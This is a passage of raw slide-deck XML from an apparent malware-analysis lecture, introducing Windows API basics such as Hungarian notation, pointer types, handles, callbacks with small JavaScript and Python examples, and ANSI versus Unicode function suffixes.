            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1067" name="Google Shape;1067;p107"/>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A broad set of functionality that governs the way that malware interacts with the Microsoft libraries.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Uses </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>Hungarian notation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1068" name="Google Shape;1068;p107"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="611576" y="2708920"/>
            <a:ext cx="8164900" cy="4106118"/>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08"/>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Windows API</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1075" name="Google Shape;1075;p108"/>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Long Pointer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>LP: win 32-bit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="https://qph.fs.quoracdn.net/main-qimg-8e76a1fd7c71319addb3ee0c7d81b48f" id="1076" name="Google Shape;1076;p108"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716016" y="2060848"/>
            <a:ext cx="2962275" cy="1943100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077" name="Google Shape;1077;p108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="2859525"/>
            <a:ext cx="3049834" cy="3046988"/>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2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>int *ptr</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GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>LPINT *ptr</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GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>LPDWORD* ptr</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GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>LPINT *ptr1, ptr2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>LPINT* ptr1, ptr2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>LPINT (*ptr) [50]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>int *(*ptr)[50]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>int (*ptr[2])[5]</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1078" name="Google Shape;1078;p108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4860032" y="4725144"/>
            <a:ext cx="272119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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>printf (*ptr) = ????</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>printf (ptr) = ?????</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>printf (&amp;ptr) = ?????</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1083" name="Google Shape;1083;p109"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4211960" y="2586286"/>
            <a:ext cx="4818818" cy="3435002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1084" name="Google Shape;1084;p109"/>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Windows API</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085" name="Google Shape;1085;p109"/>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Handles </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Handles are items that have been opened or created in the OS, such as a window, process, module, menu, file, and so on. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>CreateWindowEx; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>DestroyWindow</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>CreateFile</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086" name="Google Shape;1086;p109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150548" y="5733256"/>
            <a:ext cx="690067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hFile = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>CreateFileA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>(filename, GENERIC_READ, FILE_SHARE_READ, NULL,</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OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);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1"/>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Botnet</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="Google Shape;165;p11"/>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152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="166" name="Google Shape;166;p11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="50423" y="1196752"/>
            <a:ext cx="9063360" cy="5283944"/>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10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="2132856"/>
            <a:ext cx="5135508" cy="4247317"/>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> action(x, y, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>callback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"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return callback(x, y);</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r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> multiplication(x, y)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return x * y;</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r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> addition(x, y)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return x + y;</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alert(action(10, 10, multiplication)); // output: 100</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alert(action(10, 10, addition)); // output: 20</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1092" name="Google Shape;1092;p110"/>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Windows API</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1093" name="Google Shape;1093;p110"/>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Callback</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="this is how it works" id="1094" name="Google Shape;1094;p110"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3635896" y="1118281"/>
            <a:ext cx="5173382" cy="2742767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1095" name="Google Shape;1095;p110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5701974" y="4263516"/>
            <a:ext cx="3168352" cy="2031325"/>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> get_square(val):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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> val ** 2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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> caller(func, val): </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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> func(val)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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>caller(get_square, 5)</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11"/>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Windows API</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1102" name="Google Shape;1102;p111"/>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b="1" lang="en-GB"/>
              <a:t>ANSI vs. Unicode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Windows XP, NT: ANSI code page	 (UTF-8) with suffix –A</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>DeleteFileA (LPCSTR lpFileName)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Win2000 and later version: Unicode (UTF-16) with suffix -W</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>DeleteFileW (LPCWSTR lpFileName)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="555"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Windows API extended</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Microsoft updates a new function which is incompatible with the old one with the suffix –Ex</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>FileFirstFileA: 2 parameters (lpFileName, lpFindFileData)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>FileFirstFileExA: 6 parameters (lpFileName, fInfoLevelId, lpFindFileData, fSearchOp, lpSearchFilter, dwAdditionalFlags)</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12"/>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Windows API - Category</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1108" name="Google Shape;1108;p112"/>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b="1" lang="en-GB"/>
              <a:t>Base Services</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Provide access to the basic resources available to a Windows system, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>file systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>devices</a:t>
            </a:r>
            <a:r>
